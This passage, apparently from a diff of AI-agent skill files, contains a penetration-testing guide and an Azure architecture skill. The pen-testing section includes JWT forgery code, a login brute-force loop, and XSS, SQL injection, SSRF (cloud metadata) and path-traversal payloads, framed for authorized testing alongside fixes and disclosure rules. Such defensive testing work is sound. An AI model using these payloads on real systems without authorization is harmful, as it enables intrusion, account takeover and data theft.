paths = ['''\.test\.''', '''_test\.go''', '''mock''', '''fixture''']
```
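The three rule regexes above can be exercised locally before committing the config; a quick sketch (the sample strings use AWS's documented example key, not a real credential):

```python
import re

# The same patterns as the Gitleaks rules above, checked locally.
RULES = {
    "aws-access-key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "generic-api-key": re.compile(
        r"(?i)(api[_-]?key|apikey)\s*[:=]\s*['\"][a-zA-Z0-9]{20,}['\"]"
    ),
    "private-key": re.compile(
        r"-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----"
    ),
}

def scan(text: str) -> list[str]:
    """Return the IDs of all rules that match the given text."""
    return [rule_id for rule_id, rx in RULES.items() if rx.search(text)]

print(scan('aws_key = "AKIAIOSFODNN7EXAMPLE"'))   # ['aws-access-key']
print(scan('api_key: "abcd1234abcd1234abcd12"'))  # ['generic-api-key']
```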
### Pre-commit Hook Integration

```yaml
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/gitleaks/gitleaks
    rev: v8.18.0
    hooks:
      - id: gitleaks

  - repo: https://github.com/trufflesecurity/trufflehog
    rev: v3.63.0
    hooks:
      - id: trufflehog
        args: ["git", "file://.", "--since-commit", "HEAD", "--only-verified"]
```
### CI Integration (GitHub Actions)

```yaml
name: Secret Scan
on: [push, pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - uses: trufflesecurity/trufflehog@main
        with:
          extra_args: --only-verified
```
---

## API Security Testing

### Authentication Bypass

**JWT Manipulation:**

1. Decode token at jwt.io — inspect claims without verification
2. Change `alg` to `none` and remove signature: `eyJ...payload.`
3. Change `alg` from RS256 to HS256 and sign with the public key
4. Modify claims (`role: "admin"`, `exp: 9999999999`) and re-sign with weak secrets
5. Test key confusion: HMAC signed with RSA public key bytes
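Step 2 can be scripted with the standard library alone. A sketch that rebuilds a token with `alg: none` and an empty signature, for use only against targets you are authorized to test (the demo token below is fabricated, not a real credential):

```python
import base64
import json

def b64url(data: bytes) -> str:
    """Base64url-encode without padding, as JWTs require."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_alg_none(token: str) -> str:
    """Rebuild a JWT with alg=none and an empty signature (testing only)."""
    _, payload_b64, _ = token.split(".")
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{payload_b64}."  # trailing dot: empty signature

# Fabricated demo token (header.payload.signature)
payload = b64url(json.dumps({"sub": "123", "role": "user"}).encode())
demo = f"{b64url(json.dumps({'alg': 'HS256'}).encode())}.{payload}.sig"
print(forge_alg_none(demo).endswith("."))  # True
```

If the server accepts the forged token, signature verification is broken.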
**Session Fixation:**

1. Obtain a session token before authentication
2. Authenticate — check if the session ID changes
3. If the same session ID persists, the app is vulnerable to session fixation

### Authorization Flaws

**IDOR (Insecure Direct Object Reference):**

```
GET /api/users/123/profile → 200 (your profile)
GET /api/users/124/profile → 200 (someone else's profile — IDOR!)
GET /api/users/124/profile → 403 (properly protected)
```

Test pattern: Change numeric IDs, UUIDs, and slugs in every endpoint. Use Burp Intruder or a simple script to iterate.
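The iteration itself is trivial; the part worth getting right is the classification. A sketch of the check, fed with simulated status codes (swap in real responses collected with `requests` or Burp, against systems you are authorized to test):

```python
def classify(results: dict[int, int], own_id: int) -> list[int]:
    """Return IDs (other than your own) that unexpectedly returned 200."""
    return [uid for uid, status in results.items()
            if uid != own_id and status == 200]

# Simulated responses from iterating /api/users/{id}/profile
# with user A's (id 123) session cookie attached
results = {123: 200, 124: 403, 125: 200, 126: 403}
print(classify(results, own_id=123))  # [125] — possible IDOR
```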
**BOLA (Broken Object Level Authorization):**

Same as IDOR but specifically in REST APIs. Test every CRUD operation:

- Can user A read user B's resource?
- Can user A update user B's resource?
- Can user A delete user B's resource?

**BFLA (Broken Function Level Authorization):**

```
# Regular user tries admin endpoints
POST /api/admin/users → Should be 403
DELETE /api/admin/users/123 → Should be 403
PUT /api/settings/global → Should be 403
```

### Rate Limiting Validation

Test rate limits on critical endpoints:

```bash
# Rapid-fire login attempts
for i in $(seq 1 100); do
  curl -s -o /dev/null -w "%{http_code}\n" \
    -X POST https://target.com/api/login \
    -H "Content-Type: application/json" \
    -d '{"email":"test@test.com","password":"wrong"}'
done
# Expect: 429 after threshold (typically 5-10 attempts)
```
### Mass Assignment Detection

```
# Try adding admin fields to a regular update request
PUT /api/users/profile
{
  "name": "Normal User",
  "email": "user@test.com",
  "role": "admin",              # mass assignment attempt
  "is_verified": true,          # mass assignment attempt
  "subscription": "enterprise"  # mass assignment attempt
}
```
### GraphQL-Specific Testing

**Introspection Query:**

```graphql
{
  __schema {
    types { name fields { name type { name } } }
  }
}
```

Introspection should be **disabled in production**.
**Query Depth Attack:**

```graphql
{
  user(id: 1) {
    friends {
      friends {
        friends {
          friends {  # keep nesting until the server exhausts resources
            name
          }
        }
      }
    }
  }
}
```

**Batching Attack:**

```json
[
  {"query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }"},
  {"query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }"}
]
```

Batched mutations can bypass rate limiting when the server counts the whole batch as a single request.
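A common server-side defense against the depth attack is a query depth budget. As a rough sketch, depth can be approximated by brace nesting (production servers should walk the parsed AST with a validation rule rather than count braces):

```python
def max_depth(query: str) -> int:
    """Approximate GraphQL query depth by tracking curly-brace nesting."""
    depth = best = 0
    for ch in query:
        if ch == "{":
            depth += 1
            best = max(best, depth)
        elif ch == "}":
            depth -= 1
    return best

deep = "{ user(id: 1) { friends { friends { friends { name } } } } }"
print(max_depth(deep))      # 5
print(max_depth(deep) > 4)  # True — reject under a depth-4 budget
```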
---

## Web Vulnerability Testing

### XSS (Cross-Site Scripting)

**Reflected XSS Test Payloads** (non-destructive):

```
<script>alert(document.domain)</script>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain)
<svg onload=alert(document.domain)>
'-alert(document.domain)-'
</script><script>alert(document.domain)</script>
```

**Stored XSS**: Submit payloads in persistent fields (comments, profiles, messages), then check whether they render for other users.

**DOM-Based XSS**: Look for `innerHTML`, `document.write()`, and `eval()` operating on `location.hash`, `location.search`, or `document.referrer`.
### CSRF Token Validation

1. Capture a legitimate request with its CSRF token
2. Replay the request without the token — should fail (403)
3. Replay with a token from a different session — should fail
4. Check whether the token changes per request or is static per session
5. Verify the `SameSite` cookie attribute is set to `Strict` or `Lax`

### SQL Injection

**Detection Payloads** (safe, non-destructive):

```
' OR '1'='1
' OR '1'='1' --
" OR "1"="1
1 OR 1=1
' UNION SELECT NULL--
' AND SLEEP(5)--    (time-based blind)
' AND 1=1--         (boolean-based blind)
```
**Union-Based Enumeration** (authorized testing only):

```sql
' UNION SELECT 1,2,3--   -- Find column count
' UNION SELECT table_name,2,3 FROM information_schema.tables--
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users'--
```

**Time-Based Blind:**

```sql
' AND IF(1=1, SLEEP(5), 0)--   -- MySQL
' AND pg_sleep(5)--            -- PostgreSQL
' WAITFOR DELAY '0:0:5'--      -- MSSQL
```
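The remediation for every variant above is the same: parameterized queries. A minimal sketch using Python's built-in `sqlite3` (the schema and credentials are illustrative; any DB-API driver works the same way):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin@test.com', 'hunter2')")

def login(email: str, password: str) -> bool:
    # Placeholders (?) keep attacker input out of the SQL grammar
    row = conn.execute(
        "SELECT 1 FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row is not None

print(login("admin@test.com", "hunter2"))  # True
print(login("' OR '1'='1", "x"))           # False — payload is inert
```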
### SSRF Detection

**Payloads for SSRF testing:**

```
http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/  (AWS metadata)
http://metadata.google.internal/          (GCP metadata)
http://169.254.169.254/metadata/instance  (Azure metadata)
http://[::1]                              (IPv6 localhost)
http://0x7f000001                         (hex encoding)
http://2130706433                         (decimal encoding)
```
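On the defensive side, resolving the host and rejecting private, loopback, link-local, and reserved addresses catches most of these encodings, since the odd forms either resolve to a blocked IP or fail to resolve at all. A sketch using only the standard library:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_safe_url(url: str) -> bool:
    """Reject URLs whose host resolves to a private/loopback/link-local IP."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False  # unresolvable hosts are rejected too
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True

print(is_safe_url("http://127.0.0.1"))  # False
print(is_safe_url("http://10.0.0.1"))   # False — private range
```

Resolve once and connect to the resolved IP, or an attacker can swap DNS answers between the check and the fetch (DNS rebinding).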
### Path Traversal

```
GET /api/files?name=../../../etc/passwd
GET /api/files?name=....//....//....//etc/passwd
GET /api/files?name=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
GET /api/files?name=..%252f..%252f..%252fetc%252fpasswd  (double encoding)
```
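The standard defense is to resolve the requested name against a fixed root and reject anything that escapes it; a sketch (the upload root is a hypothetical path; `Path.is_relative_to` needs Python 3.9+):

```python
from pathlib import Path

UPLOAD_ROOT = Path("/srv/uploads").resolve()  # hypothetical file root

def safe_join(name: str) -> Path:
    """Resolve a requested filename and refuse anything outside the root."""
    candidate = (UPLOAD_ROOT / name).resolve()
    if not candidate.is_relative_to(UPLOAD_ROOT):
        raise ValueError(f"path traversal attempt: {name!r}")
    return candidate

try:
    safe_join("../../../etc/passwd")
except ValueError as err:
    print(err)  # path traversal attempt: '../../../etc/passwd'
```

Decode percent-encoding (including double encoding) before this check, since `%2e%2e%2f` only becomes `../` after decoding.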
---

## Infrastructure Security

### Misconfigured Cloud Storage

**S3 Bucket Checks:**

```bash
# Check for public read access
aws s3 ls s3://target-bucket --no-sign-request

# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket

# Check ACL
aws s3api get-bucket-acl --bucket target-bucket
```

**Common Bucket Name Patterns:**

```
{company}-backup, {company}-dev, {company}-staging
{company}-assets, {company}-uploads, {company}-logs
```
### HTTP Security Headers

Required headers and expected values:

| Header | Expected Value |
|--------|----------------|
| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` |
| `Content-Security-Policy` | Restrictive policy, no `unsafe-inline` or `unsafe-eval` |
| `X-Content-Type-Options` | `nosniff` |
| `X-Frame-Options` | `DENY` or `SAMEORIGIN` |
| `Referrer-Policy` | `strict-origin-when-cross-origin` |
| `Permissions-Policy` | Restrict camera, microphone, geolocation |
| `X-XSS-Protection` | `0` (deprecated; CSP is preferred) |
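A response's headers can be checked against this table programmatically; a sketch (the rule set is a simplified subset of the table above, not an exhaustive validator):

```python
REQUIRED = {
    "strict-transport-security": lambda v: "max-age=" in v,
    "content-security-policy": lambda v: "unsafe-inline" not in v
                                         and "unsafe-eval" not in v,
    "x-content-type-options": lambda v: v.strip() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
}

def audit_headers(headers: dict[str, str]) -> list[str]:
    """Return the names of required headers that are missing or misconfigured."""
    lower = {k.lower(): v for k, v in headers.items()}
    return [name for name, ok in REQUIRED.items()
            if name not in lower or not ok(lower[name])]

sample = {"Strict-Transport-Security": "max-age=31536000; includeSubDomains",
          "X-Content-Type-Options": "nosniff"}
print(audit_headers(sample))  # ['content-security-policy', 'x-frame-options']
```

Feed it `dict(resp.headers)` from any HTTP client to audit a live endpoint.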
### TLS Configuration

```bash
# Check TLS version and cipher suites
nmap --script ssl-enum-ciphers -p 443 target.com

# Quick check with testssl.sh
./testssl.sh target.com

# Check certificate expiry
echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates
```

**Reject:** TLS 1.0, TLS 1.1, RC4, DES, 3DES, MD5 in cipher suites, CBC-mode ciphers (BEAST), and export-grade ciphers.

### Open Port Scanning

```bash
# Quick top-1000 ports
nmap -sV target.com

# Full port scan
nmap -p- -sV target.com

# Common dangerous open ports:
# 21 (FTP), 23 (Telnet), 445 (SMB), 3389 (RDP), 6379 (Redis), 27017 (MongoDB)
```
---

## Pen Test Report Generation

Generate professional reports from structured findings:

```bash
# Generate markdown report from findings JSON
python scripts/pentest_report_generator.py --findings findings.json --format md --output report.md

# Generate JSON report
python scripts/pentest_report_generator.py --findings findings.json --format json --output report.json
```

### Findings JSON Format

```json
[
  {
    "title": "SQL Injection in Login Endpoint",
    "severity": "critical",
    "cvss_score": 9.8,
    "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
    "category": "A03:2021 - Injection",
    "description": "The /api/login endpoint is vulnerable to SQL injection via the email parameter.",
    "evidence": "Request: POST /api/login {\"email\": \"' OR 1=1--\", \"password\": \"x\"}\nResponse: 200 OK with admin session token",
    "impact": "Full database access, authentication bypass, potential remote code execution",
    "remediation": "Use parameterized queries. Replace string concatenation with prepared statements.",
    "references": ["https://cwe.mitre.org/data/definitions/89.html"]
  }
]
```

### Report Structure

1. **Executive Summary**: Business impact, overall risk level, top 3 findings
2. **Scope**: What was tested, what was excluded, testing dates
3. **Methodology**: Tools used, testing approach (black/gray/white box)
4. **Findings Table**: Sorted by severity with CVSS scores
5. **Detailed Findings**: Each with description, evidence, impact, remediation
6. **Remediation Priority Matrix**: Effort vs. impact for each fix
7. **Appendix**: Raw tool output, full payload lists
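The findings-table ordering in item 4 can be sketched as: sort by severity bucket first, then by CVSS score descending (severity names match the findings JSON format above; the sample findings are illustrative):

```python
SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}

def sort_findings(findings: list[dict]) -> list[dict]:
    """Order findings for the report table: severity first, then CVSS descending."""
    return sorted(findings,
                  key=lambda f: (SEVERITY_ORDER[f["severity"]], -f["cvss_score"]))

findings = [
    {"title": "Missing HSTS", "severity": "low", "cvss_score": 3.1},
    {"title": "SQLi in login", "severity": "critical", "cvss_score": 9.8},
    {"title": "IDOR on /profile", "severity": "high", "cvss_score": 7.5},
]
print([f["title"] for f in sort_findings(findings)])
# ['SQLi in login', 'IDOR on /profile', 'Missing HSTS']
```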
---

## Responsible Disclosure Workflow

Responsible disclosure is **mandatory** for any vulnerability found during authorized testing or independent research. See `references/responsible_disclosure.md` for full templates.

### Timeline

| Day | Action |
|-----|--------|
| 0 | Discovery — document finding with evidence |
| 1 | Report to vendor via security contact or bug bounty program |
| 7 | Follow up if no acknowledgment received |
| 30 | Request status update and remediation timeline |
| 60 | Second follow-up — offer technical assistance |
| 90 | Public disclosure (with or without fix, per industry standard) |

### Key Principles

1. **Never exploit beyond proof of concept** — demonstrate impact without causing damage
2. **Encrypt all communications** — PGP/GPG for email, secure channels for details
3. **Do not access, modify, or exfiltrate real user data** — use your own test accounts
4. **Document everything** — timestamps, screenshots, request/response pairs
5. **Respect the vendor's timeline** — extend the deadline if they're actively working on a fix
---

## Workflows

### Workflow 1: Quick Security Check (15 Minutes)

For pre-merge reviews or quick health checks:

```bash
# 1. Generate OWASP checklist
python scripts/vulnerability_scanner.py --target web --scope quick

# 2. Scan dependencies
python scripts/dependency_auditor.py --file package.json --severity high

# 3. Check for secrets in recent commits
# (Use gitleaks or trufflehog as described in the Secret Scanning section)

# 4. Review HTTP security headers
curl -sI https://target.com | grep -iE "(strict-transport|content-security|x-frame|x-content-type)"
```

**Decision**: If there are any critical or high findings, block the merge.
### Workflow 2: Full Penetration Test (Multi-Day Assessment)

**Day 1 — Reconnaissance:**

1. Map the attack surface: endpoints, authentication flows, third-party integrations
2. Run the automated OWASP checklist (full scope)
3. Run a dependency audit across all manifests
4. Run a secret scan on the full git history

**Day 2 — Manual Testing:**

1. Test authentication and authorization (IDOR, BOLA, BFLA)
2. Test injection points (SQLi, XSS, SSRF, command injection)
3. Test business logic flaws
4. Test API-specific vulnerabilities (GraphQL, rate limiting, mass assignment)

**Day 3 — Infrastructure and Reporting:**

1. Check cloud storage permissions
2. Verify TLS configuration and security headers
3. Port scan for unnecessary services
4. Compile findings into structured JSON
5. Generate the pen test report

```bash
# Generate final report
python scripts/pentest_report_generator.py --findings findings.json --format md --output pentest-report.md
```
### Workflow 3: CI/CD Security Gate

Automated security checks that run on every pull request:

```yaml
# .github/workflows/security-gate.yml
name: Security Gate
on: [pull_request]
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      # Secret scanning
      - name: Scan for secrets
        uses: trufflesecurity/trufflehog@main
        with:
          extra_args: --only-verified

      # Dependency audit
      - name: Audit dependencies
        run: |
          npm audit --audit-level=high
          pip-audit --desc

      # SAST
      - name: Static analysis
        uses: returntocorp/semgrep-action@v1
        with:
          config: >-
            p/security-audit
            p/secrets
            p/owasp-top-ten

      # Security headers check (staging only)
      - name: Check security headers
        if: github.base_ref == 'staging'
        run: |
          curl -sI $STAGING_URL | python scripts/vulnerability_scanner.py --target web --scope quick
```

**Gate Policy**: Block merge on critical/high findings. Warn on medium. Log low/info.
---

## Anti-Patterns

1. **Testing in production without authorization** — Always get written permission and use staging/test environments when possible
2. **Ignoring low-severity findings** — Low findings compound; a chain of lows can become a critical exploit path
3. **Skipping responsible disclosure** — Every vulnerability found must be reported through proper channels
4. **Relying solely on automated tools** — Tools miss business logic flaws, chained exploits, and novel attack vectors
5. **Testing without a defined scope** — Scope creep leads to legal liability; document what is and isn't in scope
6. **Reporting without remediation guidance** — Every finding must include actionable remediation steps
7. **Storing evidence insecurely** — Pen test evidence (screenshots, payloads, tokens) is sensitive; encrypt it and restrict access
8. **One-time testing** — Security testing must be continuous; integrate it into CI/CD and schedule periodic assessments
---

## Cross-References

| Skill | Relationship |
|-------|--------------|
| [senior-secops](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-secops/SKILL.md) | Defensive security operations — monitoring, incident response, SIEM configuration |
| [senior-security](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/senior-security/SKILL.md) | Security policy and governance — frameworks, risk registers, compliance |
| [dependency-auditor](https://github.com/alirezarezvani/claude-skills/tree/main/engineering/dependency-auditor/SKILL.md) | Deep supply chain security — SBOMs, license compliance, transitive risk |
| [code-reviewer](https://github.com/alirezarezvani/claude-skills/tree/main/engineering-team/code-reviewer/SKILL.md) | Code review practices — includes security review checklist |
@@ -1,6 +1,6 @@
 {
   "name": "engineering-skills",
-  "description": "26 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
+  "description": "28 production-ready engineering skills: architecture, frontend, backend, fullstack, QA, DevOps, security, AI/ML, data engineering, Playwright (9 sub-skills), self-improving agent, Stripe integration, TDD guide, Google Workspace CLI, a11y audit (WCAG 2.2), Azure cloud architect, security pen testing, and more. Agent skill and plugin for Claude Code, Codex, Gemini CLI, Cursor, OpenClaw.",
   "version": "2.1.2",
   "author": {
     "name": "Alireza Rezvani",
451
engineering-team/azure-cloud-architect/SKILL.md
Normal file
@@ -0,0 +1,451 @@
---
name: "azure-cloud-architect"
description: "Design Azure architectures for startups and enterprises. Use when asked to design Azure infrastructure, create Bicep/ARM templates, optimize Azure costs, set up Azure DevOps pipelines, or migrate to Azure. Covers AKS, App Service, Azure Functions, Cosmos DB, and cost optimization."
---

# Azure Cloud Architect

Design scalable, cost-effective Azure architectures for startups and enterprises with Bicep infrastructure-as-code templates.

---

## Workflow

### Step 1: Gather Requirements

Collect application specifications:

```
- Application type (web app, mobile backend, data pipeline, SaaS, microservices)
- Expected users and requests per second
- Budget constraints (monthly spend limit)
- Team size and Azure experience level
- Compliance requirements (GDPR, HIPAA, SOC 2, ISO 27001)
- Availability requirements (SLA, RPO/RTO)
- Region preferences (data residency, latency)
```
### Step 2: Design Architecture

Run the architecture designer to get pattern recommendations:

```bash
python scripts/architecture_designer.py \
  --app-type web_app \
  --users 10000 \
  --requirements '{"budget_monthly_usd": 500, "compliance": ["SOC2"]}'
```

**Example output:**

```json
{
  "recommended_pattern": "app_service_web",
  "service_stack": ["App Service", "Azure SQL", "Front Door", "Key Vault", "Entra ID"],
  "estimated_monthly_cost_usd": 280,
  "pros": ["Managed platform", "Built-in autoscale", "Deployment slots"],
  "cons": ["Less control than VMs", "Platform constraints", "Cold start on consumption plans"]
}
```

Select from recommended patterns:

- **App Service Web**: Front Door + App Service + Azure SQL + Redis Cache
- **Microservices on AKS**: AKS + Service Bus + Cosmos DB + API Management
- **Serverless Event-Driven**: Functions + Event Grid + Service Bus + Cosmos DB
- **Data Pipeline**: Data Factory + Synapse Analytics + Data Lake Storage + Event Hubs

See `references/architecture_patterns.md` for detailed pattern specifications.

**Validation checkpoint:** Confirm the recommended pattern matches the team's operational maturity and compliance requirements before proceeding to Step 3.
### Step 3: Generate IaC Templates

Create infrastructure-as-code for the selected pattern:

```bash
# Web app stack (Bicep)
python scripts/bicep_generator.py --arch-type web-app --output main.bicep
```

**Example Bicep output (core web app resources):**

```bicep
@description('The environment name')
param environment string = 'dev'

@description('The Azure region for resources')
param location string = resourceGroup().location

@description('The application name')
param appName string = 'myapp'

// App Service Plan
resource appServicePlan 'Microsoft.Web/serverfarms@2023-01-01' = {
  name: '${environment}-${appName}-plan'
  location: location
  sku: {
    name: 'P1v3'
    tier: 'PremiumV3'
    capacity: 1
  }
  properties: {
    reserved: true // Linux
  }
}

// App Service
resource appService 'Microsoft.Web/sites@2023-01-01' = {
  name: '${environment}-${appName}-web'
  location: location
  properties: {
    serverFarmId: appServicePlan.id
    httpsOnly: true
    siteConfig: {
      linuxFxVersion: 'NODE|20-lts'
      minTlsVersion: '1.2'
      ftpsState: 'Disabled'
      alwaysOn: true
    }
  }
  identity: {
    type: 'SystemAssigned'
  }
}

// Azure SQL Database
resource sqlServer 'Microsoft.Sql/servers@2023-05-01-preview' = {
  name: '${environment}-${appName}-sql'
  location: location
  properties: {
    administrators: {
      azureADOnlyAuthentication: true
    }
    minimalTlsVersion: '1.2'
  }
}

resource sqlDatabase 'Microsoft.Sql/servers/databases@2023-05-01-preview' = {
  parent: sqlServer
  name: '${appName}-db'
  location: location
  sku: {
    name: 'GP_S_Gen5_2'
    tier: 'GeneralPurpose'
  }
  properties: {
    autoPauseDelay: 60
    minCapacity: json('0.5')
  }
}
```

> Full templates including Front Door, Key Vault, Managed Identity, and monitoring are generated by `bicep_generator.py` and are also available in `references/architecture_patterns.md`.

**Bicep is the recommended IaC language for Azure.** Prefer Bicep over ARM JSON templates: Bicep compiles to ARM JSON, has cleaner syntax, supports modules, and is first-party supported by Microsoft.
### Step 4: Review Costs

Analyze estimated costs and optimization opportunities:

```bash
python scripts/cost_optimizer.py \
  --config current_resources.json \
  --json
```

**Example output:**

```json
{
  "current_monthly_usd": 2000,
  "recommendations": [
    { "action": "Right-size SQL Database GP_S_Gen5_8 to GP_S_Gen5_2", "savings_usd": 380, "priority": "high" },
    { "action": "Purchase 1-year Reserved Instances for AKS node pools", "savings_usd": 290, "priority": "high" },
    { "action": "Move Blob Storage to Cool tier for objects >30 days old", "savings_usd": 65, "priority": "medium" }
  ],
  "total_potential_savings_usd": 735
}
```

Output includes:

- Monthly cost breakdown by service
- Right-sizing recommendations
- Reserved Instance and Savings Plan opportunities
- Potential monthly savings
### Step 5: Configure CI/CD

Set up Azure DevOps Pipelines or GitHub Actions to deploy to Azure:

```yaml
# GitHub Actions — deploy Bicep to Azure
name: Deploy Infrastructure
on:
  push:
    branches: [main]

permissions:
  id-token: write
  contents: read

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}

      - uses: azure/arm-deploy@v2
        with:
          resourceGroupName: rg-myapp-dev
          template: ./infra/main.bicep
          parameters: environment=dev
```

```yaml
# Azure DevOps Pipeline
trigger:
  branches:
    include:
      - main

pool:
  vmImage: 'ubuntu-latest'

steps:
  - task: AzureCLI@2
    inputs:
      azureSubscription: 'MyServiceConnection'
      scriptType: 'bash'
      scriptLocation: 'inlineScript'
      inlineScript: |
        az deployment group create \
          --resource-group rg-myapp-dev \
          --template-file infra/main.bicep \
          --parameters environment=dev
```
### Step 6: Security Review

Validate security posture before production:

- **Identity**: Entra ID (Azure AD) with RBAC, Managed Identity for service-to-service auth — never store credentials in code
- **Secrets**: Key Vault for all secrets, certificates, and connection strings
- **Network**: NSGs on all subnets, Private Endpoints for PaaS services, Application Gateway with WAF
- **Encryption**: TLS 1.2+ in transit, Azure-managed or customer-managed keys at rest
- **Monitoring**: Microsoft Defender for Cloud enabled, Azure Policy for guardrails
- **Compliance**: Azure Policy assignments for SOC 2 / HIPAA / ISO 27001 initiatives

**If deployment fails:**

1. Check the deployment status:
   ```bash
   az deployment group show \
     --resource-group rg-myapp-dev \
     --name main \
     --query 'properties.error'
   ```
2. Review the Activity Log for RBAC or policy errors.
3. Validate the Bicep template before deploying:
   ```bash
   az bicep build --file main.bicep
   az deployment group validate \
     --resource-group rg-myapp-dev \
     --template-file main.bicep
   ```

**Common failure causes:**

- RBAC permission errors — verify the deploying principal has Contributor on the resource group
- Resource provider not registered — run `az provider register --namespace Microsoft.Web`
- Naming conflicts — many Azure resource names must be globally unique (storage accounts, web apps)
- Quota exceeded — request a quota increase via Azure Portal > Subscriptions > Usage + quotas
---

## Tools

### architecture_designer.py

Generates architecture pattern recommendations based on requirements.

```bash
python scripts/architecture_designer.py \
  --app-type web_app \
  --users 50000 \
  --requirements '{"budget_monthly_usd": 1000, "compliance": ["HIPAA"]}' \
  --json
```

**Input:** Application type, expected users, JSON requirements
**Output:** Recommended pattern, service stack, cost estimate, pros/cons

### cost_optimizer.py

Analyzes Azure resource configurations for cost savings.

```bash
python scripts/cost_optimizer.py --config resources.json --json
```

**Input:** JSON file with the current Azure resource inventory
**Output:** Recommendations for:

- Idle resource removal
- VM and database right-sizing
- Reserved Instance purchases
- Storage tier transitions
- Unused public IPs and load balancers

### bicep_generator.py

Generates Bicep template scaffolds from an architecture type.

```bash
python scripts/bicep_generator.py --arch-type microservices --output main.bicep
```

**Output:** Production-ready Bicep templates with:

- Managed Identity (no passwords)
- Key Vault integration
- Diagnostic settings for Azure Monitor
- Network security groups
- Tags for cost allocation
---

## Quick Start

### Web App Architecture (< $100/month)

```
Ask: "Design an Azure web app for a startup with 5000 users"

Result:
- App Service (B1 Linux) for the application
- Azure SQL Serverless for relational data
- Azure Blob Storage for static assets
- Front Door (free tier) for CDN and routing
- Key Vault for secrets
- Estimated: $40-80/month
```

### Microservices on AKS ($500-2000/month)

```
Ask: "Design a microservices architecture on Azure for a SaaS platform with 50k users"

Result:
- AKS cluster with 3 node pools (system, app, jobs)
- API Management for gateway and rate limiting
- Cosmos DB for multi-model data
- Service Bus for async messaging
- Azure Monitor + Application Insights for observability
- Multi-zone deployment
```

### Serverless Event-Driven (< $200/month)

```
Ask: "Design an event-driven backend for processing orders"

Result:
- Azure Functions (Consumption plan) for compute
- Event Grid for event routing
- Service Bus for reliable messaging
- Cosmos DB for order data
- Application Insights for monitoring
- Estimated: $30-150/month depending on volume
```

### Data Pipeline ($300-1500/month)

```
Ask: "Design a data pipeline for ingesting 10M events/day"

Result:
- Event Hubs for ingestion
- Stream Analytics or Functions for processing
- Data Lake Storage Gen2 for raw data
- Synapse Analytics for the warehouse
- Power BI for dashboards
```
---
|
||||
|
||||
## Input Requirements

Provide these details for architecture design:

| Requirement | Description | Example |
|-------------|-------------|---------|
| Application type | What you're building | SaaS platform, mobile backend |
| Expected scale | Users, requests/sec | 10k users, 100 RPS |
| Budget | Monthly Azure limit | $500/month max |
| Team context | Size, Azure experience | 3 devs, intermediate |
| Compliance | Regulatory needs | HIPAA, GDPR, SOC 2 |
| Availability | Uptime requirements | 99.9% SLA, 1hr RPO |

**JSON Format:**

```json
{
  "application_type": "saas_platform",
  "expected_users": 10000,
  "requests_per_second": 100,
  "budget_monthly_usd": 500,
  "team_size": 3,
  "azure_experience": "intermediate",
  "compliance": ["SOC2"],
  "availability_sla": "99.9%"
}
```

---

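A request missing any of these fields forces the skill to guess; a minimal sketch of a pre-flight check against the key names from the JSON format above (the validator itself is a hypothetical helper, not part of the skill):

```python
# Required keys, taken from the "JSON Format" example above.
REQUIRED_KEYS = {
    "application_type", "expected_users", "requests_per_second",
    "budget_monthly_usd", "team_size", "azure_experience",
    "compliance", "availability_sla",
}

def missing_requirements(spec: dict) -> list[str]:
    """Return the required keys absent from an architecture request."""
    return sorted(REQUIRED_KEYS - spec.keys())

spec = {"application_type": "saas_platform", "expected_users": 10000}
print(missing_requirements(spec))  # the six fields still to fill in
```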
## Anti-Patterns

| Anti-Pattern | Why It Fails | Do This Instead |
|---|---|---|
| ARM JSON templates for new projects | Verbose, hard to read, no modules | Use Bicep — compiles to ARM, cleaner syntax |
| Storing secrets in App Settings | Secrets visible in portal, no rotation | Use Key Vault references in App Settings |
| Single large AKS node pool | Cannot optimize for different workloads | Use multiple node pools: system, app, jobs |
| Public endpoints on PaaS services | Exposed attack surface | Use Private Endpoints + VNet integration |
| Over-provisioning "just in case" | Wastes budget month one | Start small, use autoscale, right-size monthly |
